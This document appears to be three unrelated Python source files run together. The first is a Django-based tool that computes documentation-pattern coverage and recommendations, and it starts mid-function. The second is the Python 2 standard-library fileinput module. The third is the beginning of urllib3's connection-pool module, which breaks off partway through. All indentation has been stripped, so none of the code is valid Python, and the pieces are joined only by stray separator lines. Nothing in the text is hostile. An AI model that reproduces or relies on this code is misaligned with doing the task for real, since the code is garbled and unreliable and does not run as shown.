# Eliminate 2 * 0.5. Others are already elimited.
if count == 1 or coverage.coverage * count == 1.0:
coverage.valid = False
coverage.save()
def combine_coverage(coverages, progress_monitor=NullProgressMonitor()):
coverages_list = list(coverages.all())
coverages_list.sort(key=lambda c: c.pattern.extension.count(),
reverse=True)
doc_patterns = []
processed_coverage = set()
cov_len = len(coverages_list)
progress_monitor.start('Processing {0} patterns'.format(cov_len), cov_len)
for i, coverage in enumerate(coverages_list):
if coverage.pk in processed_coverage:
progress_monitor.work('Skipped pattern', 1)
continue
current_best_cov = coverage.coverage
processed_coverage.add(coverage)
doc_pattern = rmodel.DocumentationPattern()
doc_pattern.save()
doc_pattern.patterns.add(coverage)
doc_patterns.append(doc_pattern)
extension = list(coverage.pattern.extension.all())
count = float(len(extension))
for tempcoverage in coverages_list[i + 1:]:
tempcoverage_value = tempcoverage.coverage
if (1.0 - (tempcoverage.pattern.extension.count() / count)) > \
SUPER_REC_THRESHOLD:
# We are too much different in terms of members
# Go to next
if tempcoverage_value > current_best_cov:
# This temp coverage has a better coverage than me, start
# a new doc pattern. There is no way the next will be
# included in this one.
# XXX Is this step even necessary?
break
if proper_subset(list(tempcoverage.pattern.extension.all()),
extension):
if tempcoverage_value > current_best_cov:
current_best_cov = tempcoverage_value
doc_pattern.patterns.add(tempcoverage)
processed_coverage.add(tempcoverage.pk)
doc_pattern.main_pattern = \
get_best_pattern(list(doc_pattern.patterns.all()))
doc_pattern.save()
progress_monitor.work('Processed documentation pattern', 1)
progress_monitor.info('Created {0} documentation patterns'.
format(len(doc_patterns)))
progress_monitor.done()
return doc_patterns
def get_best_pattern(coverages):
def thd_crit(coverage):
pattern = coverage.pattern
if pattern.criterion2 is None:
return 1
else:
return 0
def snd_crit(coverage):
pattern = coverage.pattern
if pattern.criterion1 == rmodel.HIERARCHY_D:
return 1
else:
return 0
def fst_crit(coverage):
pattern = coverage.pattern
if pattern.criterion1 == rmodel.TOKEN:
return 0
else:
return 1
def cvr(coverage):
return coverage.coverage
# For equal coverage and token/no token, favor no second criterion.
coverages.sort(key=thd_crit, reverse=True)
# For equal coverage and token/no token, favor hierarchy descendants over
# simple hierarchy
coverages.sort(key=snd_crit, reverse=True)
# For equal coverage, favor non-token Second.
coverages.sort(key=fst_crit, reverse=True)
# Favor coverage First.
coverages.sort(key=cvr, reverse=True)
return coverages[0]
def compare_coverage(codebase_from, codebase_to, source, resource_pk,
progress_monitor=NullProgressMonitor):
'''First, match head-based (declaration/hierarchy) and token-based
patterns.
Then, for each matched pattern, compare their coverage.
'''
(heads_from, tokens_from) = compute_pattern_index(codebase_from,
progress_monitor)
(heads_to, tokens_to) = compute_pattern_index(codebase_to, progress_monitor)
removed = []
added = []
heads_patterns_diff = compute_patterns_diff(heads_from, heads_to, added,
removed, progress_monitor)
tokens_patterns_diff = compute_patterns_diff(tokens_from, tokens_to, added,
removed, progress_monitor)
progress_monitor.info('Sorting added/removed')
removed.sort(key=lambda f: f.extension.count(), reverse=True)
added.sort(key=lambda f: f.extension.count(), reverse=True)
progress_monitor.info('Sorting pattern diff')
heads_patterns_diff.sort(key=lambda d: d.extension_diff)
tokens_patterns_diff.sort(key=lambda d: d.extension_diff)
heads_coverage_diff = compute_coverage_diff(heads_patterns_diff, source,
resource_pk, progress_monitor)
tokens_coverage_diff = compute_coverage_diff(tokens_patterns_diff, source,
resource_pk, progress_monitor)
progress_monitor.info('Sorting coverage diff')
# Basically, we want to look at coverage the decreased.
heads_coverage_diff.sort(key=lambda d: d.coverage_diff)
tokens_coverage_diff.sort(key=lambda d: d.coverage_diff)
report_diff(heads_patterns_diff, heads_coverage_diff, 'Head Report')
report_diff(tokens_patterns_diff, tokens_coverage_diff, 'Token Report')
report_add_remove(removed, added)
def compute_pattern_index(codebase, progress_monitor):
'''Compute an index of the patterns based on their head or token.'''
heads = defaultdict(list)
tokens = defaultdict(list)
patterns = rmodel.CodePattern.objects.filter(codebase=codebase)
progress_monitor.start('Computing pattern index for codebase {0}'
.format(codebase), patterns.count())
for pattern in patterns.all():
if pattern.head is not None:
heads[pattern.head.human_string()].append(pattern)
else:
tokens[pattern.token].append(pattern)
progress_monitor.work('Computed a pattern index', 1)
progress_monitor.done()
return (heads, tokens)
def compute_patterns_diff(index_from, index_to, added, removed,
progress_monitor):
'''For each index and each pattern, try to find a matching pattern based on
pattern.equiv.
'''
processed = set()
pattern_diffs = []
progress_monitor.start('Computing pattern diff', len(index_from))
for key in index_from:
for pattern_from in index_from[key]:
pattern_to = get_pattern(pattern_from, index_to, key)
if pattern_to is None:
removed.append(pattern_from)
else:
diff = rmodel.PatternDiff(pattern_from=pattern_from,
pattern_to=pattern_to)
diff.compute_diffs()
diff.save()
pattern_diffs.append(diff)
processed.add(pattern_to.pk)
progress_monitor.work('Computed pattern diffs', 1)
progress_monitor.info('Computing added patterns')
for patterns_to in index_to.values():
for pattern_to in patterns_to:
if pattern_to.pk not in processed:
added.append(pattern_to)
progress_monitor.done()
return pattern_diffs
def compute_coverage_diff(pattern_diffs, source, resource_pk, progress_monitor):
'''For each pattern, get the coverage related to a particular resource.
Note: a pattern in a codebase could have coverage for more than one
document (especially during experimentation/evaluation :-) ).
'''
coverage_diffs = []
progress_monitor.start('Computing coverage diff', len(pattern_diffs))
for pattern_diff in pattern_diffs:
coverage_from = pattern_diff.pattern_from.get_coverage(source,
resource_pk)
coverage_to = pattern_diff.pattern_to.get_coverage(source,
resource_pk)
if coverage_from is None or coverage_to is None:
progress_monitor.info('ERROR! One coverage is none: {0} {1}'
.format(pattern_diff.pattern_from.pk,
pattern_diff.pattern_to.pk))
progress_monitor.work('Skipping coverage diff', 1)
continue
elif not coverage_from.is_interesting():
continue
diff = rmodel.CoverageDiff(coverage_from=coverage_from,
coverage_to=coverage_to)
diff.compute_diffs()
diff.save()
coverage_diffs.append(diff)
progress_monitor.work('Computed coverage diff', 1)
progress_monitor.done()
return coverage_diffs
def report_diff(pattern_diffs, coverage_diffs, report_title):
top = 25
print()
print(report_title)
print('\nREPORTING TOP {0} PATTERN DIFFS\n'.format(top))
print('Total Pattern Diffs: {0}'.format(len(pattern_diffs)))
for pattern_diff in pattern_diffs[:top]:
print('{0}: From: {1}[{2}] To: {3} [{4}]'.
format(pattern_diff.extension_diff, pattern_diff.pattern_from,
pattern_diff.pattern_from.pk, pattern_diff.pattern_to,
pattern_diff.pattern_to.pk))
print('\nREPORTING TOP {0} COVERAGE DIFFS\n'.format(top))
print('Total coverage diffs: {0}'.format(len(coverage_diffs)))
for cov_diff in coverage_diffs[:top]:
print('{0}: From: {1}[{2}] To: {3} [{4}]'.
format(cov_diff.coverage_diff, cov_diff.coverage_from,
cov_diff.coverage_from.pk, cov_diff.coverage_to,
cov_diff.coverage_to.pk))
report_location(cov_diff.coverage_from)
print()
def report_location(coverage):
for member in coverage.pattern.extension.all():
for link in member.potential_links.filter(index=0).all():
if link.code_reference.resource_object_id ==\
coverage.resource_object_id and link.code_reference.source ==\
coverage.source:
print(' {0} in {1}/{2}'.format(member.human_string(),
link.code_reference.local_context,
link.code_reference.global_context))
def report_add_remove(removed, added):
top = 25
print()
print('REPORTING TOP {0} REMOVED PATTERNS\n'.format(top))
for pattern in removed[:top]:
print('{0}: {1}[{2}]'.format(pattern.extension.count(), pattern,
pattern.pk))
print('REPORTING TOP {0} ADDED PATTERNS\n'.format(top))
for pattern in added[:top]:
print('{0}: {1}[{2}]'.format(pattern.extension.count(), pattern,
pattern.pk))
def get_pattern(pattern, index, key):
if key not in index:
return None
else:
for temp_pattern in index[key]:
if pattern.equiv(temp_pattern):
return temp_pattern
return None
def compute_coverage_recommendation(coverage_diffs,
progress_monitor=NullProgressMonitor()):
'''For each coverage diff, check if there is at least one new element in a
pattern that was not there before (release 1) and that is not documented
now (release 2).
For each such coverage diff, create a recommendation.
'''
recommendations = []
diffs_len = size(coverage_diffs)
progress_monitor.start('Processing {0} diffs'.format(diffs_len),
diffs_len)
for coverage_diff in coverage_diffs:
(covered_mem_from, uncovered_mem_from) =\
get_members(coverage_diff.coverage_from)
(_, uncovered_mem_to) = get_members(coverage_diff.coverage_to)
members_to_doc = []
for member_key in uncovered_mem_to:
if member_key not in covered_mem_from and \
member_key not in uncovered_mem_from:
members_to_doc.append(uncovered_mem_to[member_key])
if len(members_to_doc) > 0:
recommendation = rmodel.AddRecommendation(
coverage_diff=coverage_diff)
recommendation.save()
recommendation.new_members.add(*members_to_doc)
recommendation.old_members.add(*covered_mem_from.values())
recommendations.append(recommendation)
progress_monitor.work('Processed diff', 1)
progress_monitor.done()
return recommendations
def get_members(pattern_coverage):
pattern = pattern_coverage.pattern
pk = pattern_coverage.resource_object_id
source = pattern_coverage.source
covered_members = {}
uncovered_members = {}
for member in pattern.extension.all():
if cmodel.CodeElementLink.objects.\
filter(code_element=member).\
filter(index=0).\
filter(code_reference__resource_object_id=pk).\
filter(code_reference__source=source).exists():
covered_members[member.human_string()] = member
else:
uncovered_members[member.human_string()] = member
return (covered_members, uncovered_members)
def compute_super_recommendations(recommendations,
progress_monitor=NullProgressMonitor()):
'''Combine similar recommendations together.
Recommendations are combined if there isn't more than 20% difference and
one is a proper subset of the other.
'''
recommendations.sort(key=lambda r: r.new_members.count(), reverse=True)
processed_recs = set()
super_recs = []
reclen = len(recommendations)
progress_monitor.start('Processing {0} recommendations'.format(reclen),
reclen)
for i, rec in enumerate(recommendations):
if rec.pk in processed_recs:
progress_monitor.work('Skipped rec', 1)
continue
current_best_cov = rec.coverage_diff.coverage_from.coverage
processed_recs.add(rec.pk)
super_rec = rmodel.SuperAddRecommendation(initial_rec=rec,
codebase_from=rec.coverage_diff.coverage_from.pattern.codebase,
codebase_to=rec.coverage_diff.coverage_to.pattern.codebase,
resource=rec.coverage_diff.coverage_from.resource,
source=rec.coverage_diff.coverage_from.source)
super_rec.save()
super_rec.recommendations.add(rec)
super_recs.append(super_rec)
new_members = list(rec.new_members.all())
#count = float(len(new_members))
for temprec in recommendations[i + 1:]:
coverage_from = temprec.coverage_diff.coverage_from.coverage
#if (1.0 - (temprec.new_members.count() / count)) > \
#SUPER_REC_THRESHOLD:
#if coverage_from > current_best_cov:
#break
if proper_subset(list(temprec.new_members.all()), new_members):
if coverage_from > current_best_cov:
current_best_cov = coverage_from
super_rec.recommendations.add(temprec)
processed_recs.add(temprec.pk)
super_rec.best_rec =\
get_best_rec(list(super_rec.recommendations.all()))
check_overloading(super_rec)
super_rec.save()
progress_monitor.work('Processed rec', 1)
progress_monitor.done()
sort_super_recs(super_recs)
for i, super_rec in enumerate(super_recs):
super_rec.index = i
super_rec.save()
return super_recs
def check_overloading(super_rec):
'''We don't want to recommend a new method that is an overloaded version of
an already covered method.'''
overloaded = 0
total = 0
for member in super_rec.best_rec.new_members.all():
total += 1
codebase = member.codebase
if member.kind.kind != 'method':
continue
if codebase.code_elements.filter(fqn=member.fqn).count() > 1:
overloaded += 1
if float(overloaded) / float(total) > OVERLOADED_THRESHOLD:
super_rec.overloaded = True
def proper_subset(members1, members2):
members1set = {member.human_string() for member in members1}
members2set = {member.human_string() for member in members2}
return members1set <= members2set
def get_best_rec(recommendations):
def thd_crit(rec):
pattern = rec.coverage_diff.coverage_from.pattern
if pattern.criterion2 is None:
return 1
else:
return 0
def snd_crit(rec):
pattern = rec.coverage_diff.coverage_from.pattern
if pattern.criterion1 == rmodel.HIERARCHY_D:
return 1
else:
return 0
def fst_crit(rec):
pattern = rec.coverage_diff.coverage_from.pattern
if pattern.criterion1 == rmodel.TOKEN:
return 0
else:
return 1
def cvr(rec):
return rec.coverage_diff.coverage_from.coverage
recommendations.sort(key=thd_crit, reverse=True)
recommendations.sort(key=snd_crit, reverse=True)
recommendations.sort(key=fst_crit, reverse=True)
recommendations.sort(key=cvr, reverse=True)
return recommendations[0]
def sort_super_recs(super_recommendations):
def snd_crit(super_rec):
pattern = super_rec.best_rec.coverage_diff.coverage_from.pattern
if pattern.criterion2 is None:
return 1
else:
return 0
def fst_crit(super_rec):
pattern = super_rec.best_rec.coverage_diff.coverage_from.pattern
if pattern.criterion1 == rmodel.TOKEN:
return 0
else:
return 1
def cvr(super_rec):
return super_rec.best_rec.coverage_diff.coverage_from.coverage
super_recommendations.sort(key=snd_crit, reverse=True)
super_recommendations.sort(key=fst_crit, reverse=True)
super_recommendations.sort(key=cvr, reverse=True)
def report_super(super_recs):
for super_rec in super_recs:
(sections, pages, section_spread, page_spread) = \
get_locations(super_rec)
print('\nSUPER REC: {0}'.format(super_rec))
for member in super_rec.best_rec.new_members.all():
print(' to document: {0}'.format(member.human_string()))
if super_rec.overloaded:
print('\n **Overloaded recommendation**')
print('\n Important Pages:')
for (page, members) in pages:
old_count = super_rec.best_rec.old_members.count()
covered = len(members)
print(' {0}: {1} / {2}'.format(page.title, covered, old_count))
#for member in members:
#print(' {0}'.format(member.human_string()))
if page_spread:
print('\n **New members will probably be added in new pages**')
print('\n Important Sections:')
for (section, members) in sections:
old_count = super_rec.best_rec.old_members.count()
covered = len(members)
print(' {0}: {1} / {2}'.format(section.title,
covered, old_count))
#for member in members:
#print(' {0}'.format(member.human_string()))
if section_spread:
print('\n **New members will probably be added in new sections**')
if not section_spread and not page_spread:
print('\n **New members will probably be added in most popular '
'section**')
for rec in super_rec.recommendations.all():
print(' subrec: {0}'.format(rec))
def get_locations(super_rec):
sections = ()
pages = ()
section_spread = False
page_spread = False
sections_objects = {}
pages_objects = {}
sectionsd = defaultdict(list)
pagesd = defaultdict(list)
resource_pk = super_rec.resource_object_id
source = super_rec.source
count = 0
for member in super_rec.best_rec.old_members.all():
visited_sections = set()
visited_pages = set()
for link in member.potential_links.filter(index=0).all():
if link.code_reference.resource_object_id == resource_pk and\
link.code_reference.source == source:
section = link.code_reference.local_context
page = link.code_reference.global_context
if section.pk not in visited_sections:
sections_objects[section.pk] = section
sectionsd[section.pk].append(member)
visited_sections.add(section.pk)
if page.pk not in visited_pages:
pages_objects[page.pk] = page
pagesd[page.pk].append(member)
visited_pages.add(page.pk)
count += 1
sections = [(sections_objects[pk], sectionsd[pk]) for pk in sectionsd]
pages = [(pages_objects[pk], pagesd[pk]) for pk in pagesd]
# Sort them
sections.sort(key=lambda v: len(v[1]), reverse=True)
pages.sort(key=lambda v: len(v[1]), reverse=True)
section_spread = (len(sections[0][1]) / float(count)) < LOCATION_THRESHOLD
page_spread = (len(pages[0][1]) / float(count)) < LOCATION_THRESHOLD
return (sections, pages, section_spread, page_spread)
def get_locations_coverage(coverage):
sections = ()
pages = ()
sections_objects = {}
pages_objects = {}
sectionsd = defaultdict(list)
pagesd = defaultdict(list)
resource_pk = coverage.resource_object_id
source = coverage.source
count = 0
member_locations = {}
for member in coverage.pattern.extension.all():
visited_sections = set()
visited_pages = set()
member_sections = set()
member_pages = set()
for link in member.potential_links.filter(index=0).all():
if link.code_reference.resource_object_id == resource_pk and\
link.code_reference.source == source:
section = link.code_reference.local_context
page = link.code_reference.global_context
member_sections.add(section)
member_pages.add(page)
if section.pk not in visited_sections:
sections_objects[section.pk] = section
sectionsd[section.pk].append(member)
visited_sections.add(section.pk)
if page.pk not in visited_pages:
pages_objects[page.pk] = page
pagesd[page.pk].append(member)
visited_pages.add(page.pk)
member_locations[member.pk] = (member_sections, member_pages)
count += 1
sections = [(sections_objects[pk], sectionsd[pk]) for pk in sectionsd]
pages = [(pages_objects[pk], pagesd[pk]) for pk in pagesd]
# Sort them
sections.sort(key=lambda v: len(v[1]), reverse=True)
pages.sort(key=lambda v: len(v[1]), reverse=True)
return (member_locations, sections, pages)
def compute_doc_pattern_location(doc_pattern):
(member_locations, sections, pages) = \
get_locations_coverage(doc_pattern.main_pattern)
initial_coverage = doc_pattern.main_pattern.coverage * \
doc_pattern.main_pattern.pattern.extension.count()
locations = []
for (section, members) in sections:
section_coverage = float(len(members)) / initial_coverage
if section_coverage > DOC_PATTERN_LOCATION_THRESHOLD:
single_location = \
rmodel.DocumentationPatternSingleLocation(location=section)
single_location.save()
location = rmodel.DocumentationPatternLocation(
doc_pattern=doc_pattern, single_section=True,
location=single_location, coverage=section_coverage)
location.save()
locations.append(location)
if len(locations) > 0:
# We found important sections. We're done.
return locations
multi_pages = []
for (page, members) in pages:
multi_pages.append(page)
page_coverage = float(len(members)) / initial_coverage
if page_coverage > DOC_PATTERN_LOCATION_THRESHOLD:
single_location = \
rmodel.DocumentationPatternSingleLocation(location=page)
single_location.save()
location = rmodel.DocumentationPatternLocation(
doc_pattern=doc_pattern, single_page=True,
location=single_location, coverage=page_coverage)
location.save()
locations.append(location)
if len(locations) > 0:
# We found important pages. We're done
return locations
location = rmodel.DocumentationPatternLocation(
doc_pattern=doc_pattern, multi_page=True,
coverage=1.0)
location.save()
locations.append(location)
for page in multi_pages:
single_location = \
rmodel.DocumentationPatternSingleLocation(location=page)
single_location.save()
location.locations.add(single_location)
return locations
|
|
"""Helper class to quickly write a loop over all standard input files.
Typical use is:
import fileinput
for line in fileinput.input():
process(line)
This iterates over the lines of all files listed in sys.argv[1:],
defaulting to sys.stdin if the list is empty. If a filename is '-' it
is also replaced by sys.stdin. To specify an alternative list of
filenames, pass it as the argument to input(). A single file name is
also allowed.
Functions filename(), lineno() return the filename and cumulative line
number of the line that has just been read; filelineno() returns its
line number in the current file; isfirstline() returns true iff the
line just read is the first line of its file; isstdin() returns true
iff the line was read from sys.stdin. Function nextfile() closes the
current file so that the next iteration will read the first line from
the next file (if any); lines not read from the file will not count
towards the cumulative line count; the filename is not changed until
after the first line of the next file has been read. Function close()
closes the sequence.
Before any lines have been read, filename() returns None and both line
numbers are zero; nextfile() has no effect. After all lines have been
read, filename() and the line number functions return the values
pertaining to the last line read; nextfile() has no effect.
All files are opened in text mode by default, you can override this by
setting the mode parameter to input() or FileInput.__init__().
If an I/O error occurs during opening or reading a file, the IOError
exception is raised.
If sys.stdin is used more than once, the second and further use will
return no lines, except perhaps for interactive use, or if it has been
explicitly reset (e.g. using sys.stdin.seek(0)).
Empty files are opened and immediately closed; the only time their
presence in the list of filenames is noticeable at all is when the
last file opened is empty.
It is possible that the last line of a file doesn't end in a newline
character; otherwise lines are returned including the trailing
newline.
Class FileInput is the implementation; its methods filename(),
lineno(), fileline(), isfirstline(), isstdin(), nextfile() and close()
correspond to the functions in the module. In addition it has a
readline() method which returns the next input line, and a
__getitem__() method which implements the sequence behavior. The
sequence must be accessed in strictly sequential order; sequence
access and readline() cannot be mixed.
Optional in-place filtering: if the keyword argument inplace=1 is
passed to input() or to the FileInput constructor, the file is moved
to a backup file and standard output is directed to the input file.
This makes it possible to write a filter that rewrites its input file
in place. If the keyword argument backup=".<some extension>" is also
given, it specifies the extension for the backup file, and the backup
file remains around; by default, the extension is ".bak" and it is
deleted when the output file is closed. In-place filtering is
disabled when standard input is read. XXX The current implementation
does not work for MS-DOS 8+3 filesystems.
Performance: this module is unfortunately one of the slower ways of
processing large numbers of input lines. Nevertheless, a significant
speed-up has been obtained by using readlines(bufsize) instead of
readline(). A new keyword argument, bufsize=N, is present on the
input() function and the FileInput() class to override the default
buffer size.
XXX Possible additions:
- optional getopt argument processing
- isatty()
- read(), read(size), even readlines()
"""
import sys, os
__all__ = ["input","close","nextfile","filename","lineno","filelineno",
"isfirstline","isstdin","FileInput"]
_state = None
DEFAULT_BUFSIZE = 8*1024
def input(files=None, inplace=0, backup="", bufsize=0,
mode="r", openhook=None):
"""input([files[, inplace[, backup[, mode[, openhook]]]]])
Create an instance of the FileInput class. The instance will be used
as global state for the functions of this module, and is also returned
to use during iteration. The parameters to this function will be passed
along to the constructor of the FileInput class.
"""
global _state
if _state and _state._file:
raise RuntimeError, "input() already active"
_state = FileInput(files, inplace, backup, bufsize, mode, openhook)
return _state
def close():
"""Close the sequence."""
global _state
state = _state
_state = None
if state:
state.close()
def nextfile():
"""
Close the current file so that the next iteration will read the first
line from the next file (if any); lines not read from the file will
not count towards the cumulative line count. The filename is not
changed until after the first line of the next file has been read.
Before the first line has been read, this function has no effect;
it cannot be used to skip the first file. After the last line of the
last file has been read, this function has no effect.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.nextfile()
def filename():
"""
Return the name of the file currently being read.
Before the first line has been read, returns None.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.filename()
def lineno():
"""
Return the cumulative line number of the line that has just been read.
Before the first line has been read, returns 0. After the last line
of the last file has been read, returns the line number of that line.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.lineno()
def filelineno():
"""
Return the line number in the current file. Before the first line
has been read, returns 0. After the last line of the last file has
been read, returns the line number of that line within the file.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.filelineno()
def fileno():
"""
Return the file number of the current file. When no file is currently
opened, returns -1.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.fileno()
def isfirstline():
"""
Returns true the line just read is the first line of its file,
otherwise returns false.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.isfirstline()
def isstdin():
"""
Returns true if the last line was read from sys.stdin,
otherwise returns false.
"""
if not _state:
raise RuntimeError, "no active input()"
return _state.isstdin()
class FileInput:
"""class FileInput([files[, inplace[, backup[, mode[, openhook]]]]])
Class FileInput is the implementation of the module; its methods
filename(), lineno(), fileline(), isfirstline(), isstdin(), fileno(),
nextfile() and close() correspond to the functions of the same name
in the module.
In addition it has a readline() method which returns the next
input line, and a __getitem__() method which implements the
sequence behavior. The sequence must be accessed in strictly
sequential order; random access and readline() cannot be mixed.
"""
def __init__(self, files=None, inplace=0, backup="", bufsize=0,
mode="r", openhook=None):
if isinstance(files, basestring):
files = (files,)
else:
if files is None:
files = sys.argv[1:]
if not files:
files = ('-',)
else:
files = tuple(files)
self._files = files
self._inplace = inplace
self._backup = backup
self._bufsize = bufsize or DEFAULT_BUFSIZE
self._savestdout = None
self._output = None
self._filename = None
self._lineno = 0
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = None
self._buffer = []
self._bufindex = 0
# restrict mode argument to reading modes
if mode not in ('r', 'rU', 'U', 'rb'):
raise ValueError("FileInput opening mode must be one of "
"'r', 'rU', 'U' and 'rb'")
self._mode = mode
if inplace and openhook:
raise ValueError("FileInput cannot use an opening hook in inplace mode")
elif openhook and not callable(openhook):
raise ValueError("FileInput openhook must be callable")
self._openhook = openhook
def __del__(self):
self.close()
def close(self):
self.nextfile()
self._files = ()
def __iter__(self):
return self
def next(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
line = self.readline()
if not line:
raise StopIteration
return line
def __getitem__(self, i):
if i != self._lineno:
raise RuntimeError, "accessing lines out of order"
try:
return self.next()
except StopIteration:
raise IndexError, "end of input reached"
def nextfile(self):
savestdout = self._savestdout
self._savestdout = 0
if savestdout:
sys.stdout = savestdout
output = self._output
self._output = 0
if output:
output.close()
file = self._file
self._file = 0
if file and not self._isstdin:
file.close()
backupfilename = self._backupfilename
self._backupfilename = 0
if backupfilename and not self._backup:
try: os.unlink(backupfilename)
except OSError: pass
self._isstdin = False
self._buffer = []
self._bufindex = 0
def readline(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
if not self._file:
if not self._files:
return ""
self._filename = self._files[0]
self._files = self._files[1:]
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = 0
if self._filename == '-':
self._filename = '<stdin>'
self._file = sys.stdin
self._isstdin = True
else:
if self._inplace:
self._backupfilename = (
self._filename + (self._backup or os.extsep+"bak"))
try: os.unlink(self._backupfilename)
except os.error: pass
# The next few lines may raise IOError
os.rename(self._filename, self._backupfilename)
self._file = open(self._backupfilename, self._mode)
try:
perm = os.fstat(self._file.fileno()).st_mode
except (AttributeError, OSError):
# AttributeError occurs in Jython, where there's no
# os.fstat.
self._output = open(self._filename, "w")
else:
fd = os.open(self._filename,
os.O_CREAT | os.O_WRONLY | os.O_TRUNC,
perm)
self._output = os.fdopen(fd, "w")
try:
if hasattr(os, 'chmod'):
os.chmod(self._filename, perm)
except OSError:
pass
self._savestdout = sys.stdout
sys.stdout = self._output
else:
# This may raise IOError
if self._openhook:
self._file = self._openhook(self._filename, self._mode)
else:
self._file = open(self._filename, self._mode)
self._buffer = self._file.readlines(self._bufsize)
self._bufindex = 0
if not self._buffer:
self.nextfile()
# Recursive call
return self.readline()
def filename(self):
return self._filename
def lineno(self):
return self._lineno
def filelineno(self):
return self._filelineno
def fileno(self):
if self._file:
try:
return self._file.fileno()
except ValueError:
return -1
else:
return -1
def isfirstline(self):
return self._filelineno == 1
def isstdin(self):
return self._isstdin
def hook_compressed(filename, mode):
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode)
elif ext == '.bz2':
import bz2
return bz2.BZ2File(filename, mode)
else:
return open(filename, mode)
def hook_encoded(encoding):
import codecs
def openhook(filename, mode):
return codecs.open(filename, mode, encoding)
return openhook
def _test():
import getopt
inplace = 0
backup = 0
opts, args = getopt.getopt(sys.argv[1:], "ib:")
for o, a in opts:
if o == '-i': inplace = 1
if o == '-b': backup = a
for line in input(args, inplace=inplace, backup=backup):
if line[-1:] == '\n': line = line[:-1]
if line[-1:] == '\r': line = line[:-1]
print "%d: %s[%d]%s %s" % (lineno(), filename(), filelineno(),
isfirstline() and "*" or "", line)
print "%d: %s[%d]" % (lineno(), filename(), filelineno())
if __name__ == '__main__':
_test()
|
|
import errno
import logging
import sys
import warnings
from socket import error as SocketError, timeout as SocketTimeout
import socket
try: # Python 3
from queue import LifoQueue, Empty, Full
except ImportError:
from Queue import LifoQueue, Empty, Full
import Queue as _ # Platform-specific: Windows
from .exceptions import (
ClosedPoolError,
ProtocolError,
EmptyPoolError,
HostChangedError,
LocationValueError,
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
TimeoutError,
InsecureRequestWarning,
)
from .packages.ssl_match_hostname import CertificateError
from .packages import six
from .connection import (
port_by_scheme,
DummyConnection,
HTTPConnection, HTTPSConnection, VerifiedHTTPSConnection,
HTTPException, BaseSSLError, ConnectionError
)
from .request import RequestMethods
from .response import HTTPResponse
from .util.connection import is_connection_dropped
from .util.retry import Retry
from .util.timeout import Timeout
from .util.url import get_host
xrange = six.moves.xrange
log = logging.getLogger(__name__)
_Default = object()
## Pool objects
class ConnectionPool(object):
"""
Base class for all connection pools, such as
:class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`.
"""
scheme = None
QueueCls = LifoQueue
def __init__(self, host, port=None):
if not host:
raise LocationValueError("No host specified.")
# httplib doesn't like it when we include brackets in ipv6 addresses
self.host = host.strip('[]')
self.port = port
def __str__(self):
return '%s(host=%r, port=%r)' % (type(self).__name__,
self.host, self.port)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Return False to re-raise any potential exceptions
return False
def close():
"""
Close all pooled connections and disable the pool.
"""
pass
# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
_blocking_errnos = set([errno.EAGAIN, errno.EWOULDBLOCK])
class HTTPConnectionPool(ConnectionPool, RequestMethods):
"""
Thread-safe connection pool for one host.
:param host:
Host used for this HTTP Connection (e.g. "localhost"), passed into
:class:`httplib.HTTPConnection`.
:param port:
Port used for this HTTP Connection (None is equivalent to 80), passed
into :class:`httplib.HTTPConnection`.
:param strict:
Causes BadStatusLine to be raised if the status line can't be parsed
as a valid HTTP/1.0 or 1.1 status line, passed into
:class:`httplib.HTTPConnection`.
.. note::
Only works in Python 2. This parameter is ignored in Python 3.
:param timeout:
Socket timeout in seconds for each individual connection. This can
be a float or integer, which sets the timeout for the HTTP request,
or an instance of :class:`urllib3.util.Timeout` which gives you more
fine-grained control over request timeouts. After the constructor has
been parsed, this is always a `urllib3.util.Timeout` object.
:param maxsize:
Number of connections to save that can be reused. More than 1 is useful
in multithreaded situations. If ``block`` is set to false, more
connections will be created but they will not be saved once they've
been used.
:param block:
If set to True, no more than ``maxsize`` connections will be used at
a time. When no free connections are available, the call will block
until a connection has been released. This is a useful side effect for
particular multithreaded situations where one does not want to use more
than maxsize connections per host to prevent flooding.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param retries:
Retry configuration to use by default with requests in this pool.
:param _proxy:
Parsed proxy URL, should not be used directly, instead, see
:class:`urllib3.connectionpool.ProxyManager`"
:param _proxy_headers:
A dictionary with proxy headers, should not be used directly,
instead, see :class:`urllib3.connectionpool.ProxyManager`"
:param \**conn_kw:
Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`,
:class:`urllib3.connection.HTTPSConnection` instances.
"""
scheme = 'http'
ConnectionCls = HTTPConnection
def __init__(self, host, port=None, strict=False,
timeout=Timeout.DEFAULT_TIMEOUT, maxsize=1, block=False,
headers=None, retries=None,
_proxy=None, _proxy_headers=None,
**conn_kw):
ConnectionPool.__init__(self, host, port)
RequestMethods.__init__(self, headers)
self.strict = strict
if not isinstance(timeout, Timeout):
timeout = Timeout.from_float(timeout)
if retries is None:
retries = Retry.DEFAULT
self.timeout = timeout
self.retries = retries
self.pool = self.QueueCls(maxsize)
self.block = block
self.proxy = _proxy
self.proxy_headers = _proxy_headers or {}
# Fill the queue up so that doing get() on it will block properly
for _ in xrange(maxsize):
self.pool.put(None)
# These are mostly for testing and debugging purposes.
self.num_connections = 0
self.num_requests = 0
self.conn_kw = conn_kw
if self.proxy:
# Enable Nagle's algorithm for proxies, to avoid packet fragmentation.
# We cannot know if the user has added default socket options, so we cannot replace the
# list.
self.conn_kw.setdefault('socket_options', [])
def _new_conn(self):
"""
Return a fresh :class:`HTTPConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTP connection (%d): %s" %
(self.num_connections, self.host))
